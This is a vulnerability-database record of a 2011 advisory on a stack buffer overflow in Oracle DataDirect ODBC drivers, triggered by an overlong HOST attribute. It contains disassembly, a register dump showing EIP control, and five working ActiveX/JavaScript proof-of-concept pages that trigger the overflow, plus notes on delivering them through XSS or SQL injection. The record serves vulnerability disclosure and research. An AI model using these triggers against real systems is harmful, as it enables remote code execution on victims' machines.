DATABASE RESOURCES PRICING ABOUT US

{"id": "SECURITYVULNS:DOC:27249", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow ", "description": "\r\nOracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow\r\n\r\n\r\n\r\nEDB-ID: 18007\t CVE: N/A\tOSVDB-ID: N/A\r\nAuthor: rgod\tPublished: 2011-10-20\tVerified: \r\nExploit Code: \tVulnerable App: N/A\t\r\nRating\r\nOverall: (0.0)\r\n\r\nOracle DataDirect Multiple Native Wire Protocol ODBC Drivers\r\nHOST Attribute Stack Based Buffer Overflow Vulnerability\r\n\r\ntested against: Microsoft Windows 2k3 r2 sp2\r\n Oracle Hyperion Performance Management and BI (v11.1.2.1.0)\r\n\r\ndownload url of the Oracle Hyperion suite:\r\nhttp://www.oracle.com/technetwork/middleware/epm/downloads/index.html\r\n\r\nfiles tested:\r\nSystemInstaller-11121-win32.zip\r\nFoundationServices-11121-win32-Part1.zip\r\nFoundationServices-11121-win32-Part2.zip\r\nFoundationServices-11121-win32-Part3.zip\r\nFoundationServices-11121-win32-Part4.zip\r\nFoundationServices-11121-Part5.zip\r\nFoundationServices-11121-Part6.zip\r\nFoundationServices-11121-Part7.zip\r\nStaticContent-11121.zip\r\nRandAFoundation-11121.zip\r\nEPM_Architect-11121.zip\r\n\r\nVulnerability:\r\n\r\nThe mentioned product installs various drivers to allow\r\nthe software to get informations from ODBC data sources.\r\nSome of them are vulnerable to a remote stack based buffer \r\noverflow which can be triggered by specifying an overlong\r\nHOST attribute inside the connection string. The software\r\ntries to do an unicode/ASCII conversion. \r\nIn doing this, the stack is completely smashed\r\nallowing to redirect the execution flow to an user supplied buffer.\r\n\r\nAnalysis for (*) and errata corrige, too many nights awake :\r\nWhen receiveng the attribute, arsqls24.dll \r\ndoes an unicode/ASCII conversion; this fragment of code\r\ncounts the number of bytes needed and store it in eax\r\n...\r\n01D45C10 83C1 02 add ecx,2\r\n01D45C13 83C0 01 add eax,1\r\n01D45C16 66:8339 00 cmp word ptr ds:[ecx],0\r\n01D45C1A ^75 F4 jnz short ARSQLS24.01D45C10\r\n...\r\nthe next operation is a copy loop which moves the needed\r\nbytes to a memory region pointed by ecx, trusting the \r\neax counter.\r\n...\r\n01D48C36 8A16 mov dl,byte ptr ds:[esi]\r\n01D48C38 83E8 01 sub eax,1\r\n01D48C3B 8811 mov byte ptr ds:[ecx],dl\r\n01D48C3D 83C1 01 add ecx,1\r\n01D48C40 83C6 02 add esi,2\r\n01D48C43 85C0 test eax,eax\r\n01D48C45 ^75 EF jnz short ARSQLS24.01D48C36\r\n...\r\nThe memory region pointed by ecx is adjacent to critical\r\nstructures (stack pointers), so when the HOST attribute\r\nis an overlong string the stack is partially overwritten\r\nwith user supplied values. The result, after a few steps:\r\n\r\nEAX FFFFFFFF\r\nECX 00000003\r\nEDX 02B52E88\r\nEBX 0013C720 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nESP 0013C720 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nEBP 0013D1A4\r\nESI 02B56FF8\r\nEDI 00000001\r\nEIP 41414141\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 1 CS 001B 32bit 0(FFFFFFFF)\r\nA 0 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFDF000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 LastErr WSAHOST_NOT_FOUND (00002AF9)\r\nEFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)\r\nMM0 0000 0000 0000 0000\r\nMM1 0000 0000 0000 0000\r\nMM2 0000 0000 0000 0000\r\nMM3 0000 0000 0000 0000\r\nMM4 0000 0000 0000 0000\r\nMM5 0000 0000 0000 0000\r\nMM6 8000 0000 0000 0000\r\nMM7 FEE0 0000 0000 0000\r\n\r\npoc:\r\n\r\nThe underlying operating system contains the ADODB Connection\r\nActiveX control which is marked safe for initialization\r\nand safe for scripting (implements the IObjectSafety interface)\r\nwhich could allow a remote attacker to specify the\r\nmentioned connection string. \r\n\r\nThe IE security settings do not allow to open a connection\r\nfrom another domain but this can be used in conjunction \r\nwith a XSS vulnerabilty, connection string pollution or \r\nSQL injection vulnerabilities or through specific configuration\r\nfiles. Note also that I am mentioning the ADODB object for pure\r\ncommodity: when installed, the ODBC drivers are availiable \r\nsystemwide, so this is a good basis for remote privilege elevations\r\nof many kinds. \r\n\r\nNote that Internet Explorer does not crash when trying to\r\nexecute EIP, attach a tool like faultmon to the IE sub-process.\r\n\r\n(*)\r\n<!-- saved from url=(0014)about:internet --> \r\n<script>\r\nvar obj = new ActiveXObject("ADODB.Connection");\r\nx=""; for (i=0;i<666;i++){x = x + "AAAA"}\r\nobj.ConnectionString ="DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=xxxxxx;UID=sa;PWD=null";\r\nobj.Open();\r\n</script>\r\n\r\n<!-- saved from url=(0014)about:internet --> \r\n<script>\r\nvar obj = new ActiveXObject("ADODB.Connection");\r\nx=""; for (i=0;i<1666;i++){x = x + "AAAA"}\r\nobj.ConnectionString ="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";\r\nobj.Open();\r\n</script>\r\n\r\n<!-- saved from url=(0014)about:internet --> \r\n<script>\r\nvar obj = new ActiveXObject("ADODB.Connection");\r\nx=""; for (i=0;i<1666;i++){x = x + "AAAA"}\r\nobj.ConnectionString ="DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";\r\nobj.Open();\r\n</script>\r\n\r\n<!-- saved from url=(0014)about:internet --> \r\n<script>\r\nvar obj = new ActiveXObject("ADODB.Connection");\r\nx=""; for (i=0;i<1666;i++){x = x + "AAAA"}\r\nobj.ConnectionString ="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=" + x +";UID=system;PWD=XXXXXXXXX;";\r\nobj.Open();\r\n</script>\r\n\r\n<!-- saved from url=(0014)about:internet --> \r\n<script>\r\nvar obj = new ActiveXObject("ADODB.Connection");\r\nx=""; for (i=0;i<700;i++){x = x + "AAAA"}\r\nobj.ConnectionString ="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";\r\nobj.Open();\r\n</script>\r\n\r\n//0.07 20/10/2011 - rgod\r\n", "published": "2011-11-01T00:00:00", "modified": "2011-11-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27249", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:42", "viewCount": 175, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:18007"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12009"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": 0.5}, "_state": {"dependencies": 1678962961, "score": 1698853398, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "f3c0c1e95ea04db02f6a4e21d68ea90d"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}

{}